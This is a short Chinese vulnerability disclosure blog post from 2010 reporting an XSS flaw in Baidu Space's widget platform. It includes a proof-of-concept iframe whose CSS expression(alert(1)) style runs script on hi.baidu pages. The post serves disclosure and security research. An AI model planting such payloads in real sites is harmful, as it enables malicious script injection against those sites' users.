hi.baidu widget(11294) xss Bug

Author: hi_heige
Blog: http://hi.baidu.com/hi_heige
Team: http://www.80vul.com
date: 2010年6月25日

一 综述
百度模块分享平台(http://act.hi.baidu.com/widget)是百度于2008年8月发布的,借此平台,用户可以方便地升级扩展空间的功能,用户之间还可以将自己制作的模块与别人共享,
经过测试发现模块"新浪微博插件"即:http://act.hi.baidu.com/widget/info/11294存在xss漏洞,当攻击者应用该模块,可导致在hi.baidu插入恶意的js/html代码。

二 PoC

应用模块:
http://act.hi.baidu.com/widget/info/11294

设置–>HTML代码–>输入
<iframe id="sina_widget_11294" style="width:expression(alert(1)); height:500px" frameborder="0" scrolling="no" src="http://v.t.sina.com.cn/widget/widget_blog.php?uid=1642398891&height=500&skin=wd_03&showpic=1"></iframe>

三 补丁[fix]

等待官方补丁

发表评论?

0 条评论。

发表评论